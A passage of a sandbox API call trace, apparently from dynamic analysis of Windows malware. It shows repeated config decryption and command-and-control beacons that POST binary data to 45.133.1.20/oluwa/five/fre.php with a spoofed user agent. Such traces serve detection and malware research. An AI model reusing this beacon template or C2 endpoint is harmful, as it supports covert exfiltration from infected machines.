pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0168.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.970] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0168.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.971] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0168.971] GetProcessHeap () returned 0x6a0000 [0168.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0168.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.973] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0168.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.974] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0168.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.977] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0168.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.978] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0168.978] GetProcessHeap () returned 0x6a0000 [0168.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0168.979] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0168.979] GetProcessHeap () returned 0x6a0000 [0168.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0168.979] GetProcessHeap () returned 0x6a0000 [0168.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0168.980] GetProcessHeap () returned 0x6a0000 [0168.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0168.980] GetProcessHeap () returned 0x6a0000 [0168.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0168.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.981] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0168.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.990] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0169.005] GetProcessHeap () returned 0x6a0000 [0169.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0169.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.006] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0169.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.010] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0169.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.011] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0169.011] GetProcessHeap () returned 0x6a0000 [0169.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0169.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.013] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0169.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.014] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0169.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.015] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0169.015] GetProcessHeap () returned 0x6a0000 [0169.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0169.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.016] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0169.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.020] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0169.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.061] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0169.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.062] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0169.063] GetProcessHeap () returned 0x6a0000 [0169.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0169.063] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9c80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea48*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0169.063] GetProcessHeap () returned 0x6a0000 [0169.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0169.063] socket (af=2, type=1, protocol=6) returned 0x330 [0169.063] connect (s=0x330, name=0x6bea48*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0169.104] FreeAddrInfoW (pAddrInfo=0x6b9c80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea48*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0169.119] GetProcessHeap () returned 0x6a0000 [0169.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0169.124] GetProcessHeap () returned 0x6a0000 [0169.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0169.125] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0169.127] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0169.127] GetProcessHeap () returned 0x6a0000 [0169.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0169.127] GetProcessHeap () returned 0x6a0000 [0169.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0169.128] GetProcessHeap () returned 0x6a0000 [0169.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0169.128] GetProcessHeap () returned 0x6a0000 [0169.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0169.129] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0169.130] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0169.130] GetProcessHeap () returned 0x6a0000 [0169.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0169.130] GetProcessHeap () returned 0x6a0000 [0169.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0169.131] send (s=0x330, buf=0x6bbd20*, len=242, flags=0) returned 242 [0169.132] send (s=0x330, buf=0x6bb998*, len=159, flags=0) returned 159 [0169.132] GetProcessHeap () returned 0x6a0000 [0169.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0169.132] recv (in: s=0x330, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0169.212] GetProcessHeap () returned 0x6a0000 [0169.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0169.213] GetProcessHeap () returned 0x6a0000 [0169.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0169.213] GetProcessHeap () returned 0x6a0000 [0169.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0169.214] GetProcessHeap () returned 0x6a0000 [0169.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0169.216] closesocket (s=0x330) returned 0 [0169.216] GetProcessHeap () returned 0x6a0000 [0169.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0169.216] GetProcessHeap () returned 0x6a0000 [0169.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0169.217] GetProcessHeap () returned 0x6a0000 [0169.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0169.217] GetProcessHeap () returned 0x6a0000 [0169.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0169.235] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc50) returned 0x330 [0169.237] Sleep (dwMilliseconds=0xea60) [0169.239] GetProcessHeap () returned 0x6a0000 [0169.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0169.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.241] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0169.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.256] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0169.266] GetProcessHeap () returned 0x6a0000 [0169.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0169.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.268] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0169.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.270] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0169.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.271] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0169.271] GetProcessHeap () returned 0x6a0000 [0169.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0169.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.273] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0169.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.275] CryptDestroyKey (hKey=0x6ad520) returned 1 [0169.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.276] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0169.276] GetProcessHeap () returned 0x6a0000 [0169.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0169.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.278] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0169.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.279] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0169.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.280] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0169.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.282] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0169.282] GetProcessHeap () returned 0x6a0000 [0169.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0169.282] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0169.282] GetProcessHeap () returned 0x6a0000 [0169.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0169.283] GetProcessHeap () returned 0x6a0000 [0169.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0169.283] GetProcessHeap () returned 0x6a0000 [0169.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0169.283] GetProcessHeap () returned 0x6a0000 [0169.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0169.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.285] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0169.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0169.302] GetProcessHeap () returned 0x6a0000 [0169.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0169.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.303] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0169.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.305] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0169.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.306] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0169.306] GetProcessHeap () returned 0x6a0000 [0169.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0169.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.308] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0169.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.309] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0169.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.311] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0169.311] GetProcessHeap () returned 0x6a0000 [0169.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0169.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.312] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0169.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.314] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0169.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.315] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0169.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.316] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0169.316] GetProcessHeap () returned 0x6a0000 [0169.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0169.316] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9b40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0169.316] GetProcessHeap () returned 0x6a0000 [0169.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0169.317] socket (af=2, type=1, protocol=6) returned 0x334 [0169.317] connect (s=0x334, name=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0169.346] FreeAddrInfoW (pAddrInfo=0x6b9b40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0169.346] GetProcessHeap () returned 0x6a0000 [0169.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0169.346] GetProcessHeap () returned 0x6a0000 [0169.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0169.347] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0169.348] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0169.348] GetProcessHeap () returned 0x6a0000 [0169.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0169.348] GetProcessHeap () returned 0x6a0000 [0169.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0169.349] GetProcessHeap () returned 0x6a0000 [0169.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0169.349] GetProcessHeap () returned 0x6a0000 [0169.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0169.350] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0169.351] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0169.351] GetProcessHeap () returned 0x6a0000 [0169.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0169.351] GetProcessHeap () returned 0x6a0000 [0169.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0169.351] send (s=0x334, buf=0x6bbd20*, len=242, flags=0) returned 242 [0169.352] send (s=0x334, buf=0x6bb998*, len=159, flags=0) returned 159 [0169.352] GetProcessHeap () returned 0x6a0000 [0169.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0169.352] recv (in: s=0x334, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0169.437] GetProcessHeap () returned 0x6a0000 [0169.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0169.438] GetProcessHeap () returned 0x6a0000 [0169.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0169.440] GetProcessHeap () returned 0x6a0000 [0169.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0169.440] GetProcessHeap () returned 0x6a0000 [0169.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0169.440] closesocket (s=0x334) returned 0 [0169.441] GetProcessHeap () returned 0x6a0000 [0169.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0169.441] GetProcessHeap () returned 0x6a0000 [0169.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0169.441] GetProcessHeap () returned 0x6a0000 [0169.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0169.442] GetProcessHeap () returned 0x6a0000 [0169.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0169.442] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x328) returned 0x334 [0169.444] Sleep (dwMilliseconds=0xea60) [0169.446] GetProcessHeap () returned 0x6a0000 [0169.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0169.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.447] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0169.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.453] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0169.461] GetProcessHeap () returned 0x6a0000 [0169.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9c38 [0169.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.463] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b9c38, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0169.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.464] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0169.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.466] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0169.466] GetProcessHeap () returned 0x6a0000 [0169.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c38 | out: hHeap=0x6a0000) returned 1 [0169.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.467] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0169.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.469] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0169.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0169.471] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0169.471] GetProcessHeap () returned 0x6a0000 [0169.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0169.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.472] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0169.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.475] 